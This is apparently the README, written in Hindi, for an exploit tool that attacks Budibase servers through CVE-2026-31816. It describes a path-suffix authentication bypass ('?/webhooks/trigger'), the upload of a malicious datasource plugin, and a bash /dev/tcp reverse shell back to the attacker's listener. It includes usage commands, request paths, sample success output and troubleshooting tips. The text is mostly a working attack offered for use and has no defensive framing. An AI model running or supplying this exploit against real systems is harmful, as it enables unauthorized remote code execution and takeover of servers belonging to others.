
CVE-2026-31816 में Budibase का शोषण करके प्रमाणीकरण को बायपास करता है, एक दुर्भावनापूर्ण डेटासोर्स प्लगइन अपलोड करता है, और रिमोट एक्सेस के लिए रिवर्स शेल निष्पादित करता है।
यह टूल CVE-2026-31816 का उपयोग करके लक्षित Budibase सर्वर पर रिवर्स शेल कनेक्शन स्थापित करता है।
अटैक चेन: प्रमाणीकरण बायपास → DATASOURCE प्लगइन अपलोड → सर्वर-साइड कोड निष्पादन → रिवर्स शेल
requests लाइब्रेरी (pip install requests)# 1. अटैकर मशीन पर लिसनर शुरू करें
nc -lvnp 4444
# 2. एक्सप्लॉइट चलाएँ (दूसरा टर्मिनल)
python3 CVE-2026-31816-rshell.py -t http://target:10000 --lhost YOUR_IP --lport 4444
| पैरामीटर | आवश्यक | विवरण |
|---|---|---|
-t, --target | ✅ | लक्षित Budibase URL |
--lhost | ✅ | लिसनर होस्ट (आपका IP) |
--lport | ❌ | लिसनर पोर्ट (डिफ़ॉल्ट: 4444) |
# अटैकर IP: 192.168.1.100
# लक्षित Budibase: 192.168.1.128:10000
# टर्मिनल 1 - लिसनर शुरू करें
nc -lvnp 4444
# टर्मिनल 2 - एक्सप्लॉइट चलाएँ
python3 CVE-2026-31816-rshell.py \
-t http://192.168.1.128:10000 \
--lhost 192.168.1.100 \
--lport 4444
GET /api/integrations?/webhooks/trigger
यदि 200 लौटता है, तो लक्ष्य प्रमाणीकरण बायपास के प्रति संवेदनशील है।
{
"type": "datasource",
"schema": { ... }
}
DATASOURCE प्रकार के प्लगइन सर्वर पर JavaScript कोड निष्पादित करते हैं।
// प्लगइन सत्यापित होने पर निष्पादित:
bash -c 'bash -i >& /dev/tcp/LHOST/LPORT 0>&1'
POST /api/plugin/upload?/webhooks/trigger
प्रमाणीकरण को बायपास करके प्लगइन अपलोड करें। सत्यापन के दौरान कोड निष्पादित होता है।
┌─────────────┐ ┌─────────────┐ ┌─────────────┐
│ Attacker │ │ Target │ │ Listener │
│ │ │ Server │ │ (nc) │
│ │ │ │ │ │
│ exploit ────┼────►│ Upload │ │ │
│ │ │ Plugin │ │ │
│ │ │ Execute │────►│ Listen │
│ │ │ Code │◄────┤ Reverse │
│ │ │ │ │ Connect │
└─────────────┘ └─────────────┘ └─────────────┘
============================================================
CVE-2026-31816 - Reverse Shell Exploit
============================================================
[*] Target: http://192.168.1.128:10000
[*] Reverse shell: 192.168.1.100:4444
[*] Checking vulnerability...
[+] Target is vulnerable!
[*] Creating reverse shell plugin targeting 192.168.1.100:4444
[*] Uploading reverse shell plugin...
[*] Status: 200
[+] Plugin installed successfully!
============================================================
[+] SUCCESS! Check your listener!
============================================================
संभावित कारण:
समाधान:
# नेटवर्क कनेक्टिविटी जाँचें
ping YOUR_IP
# फ़ायरवॉल जाँचें
sudo ufw allow 4444/tcp
# अलग पोर्ट आज़माएँ
nc -lvnp 8080
संभावित कारण:
समाधान:
# मैन्युअल रूप से जाँचें कि संवेदनशीलता मौजूद है या नहीं
curl -s "http://target:10000/api/integrations?/webhooks/trigger"
# यदि JSON लौटता है, तो संवेदनशीलता मौजूद है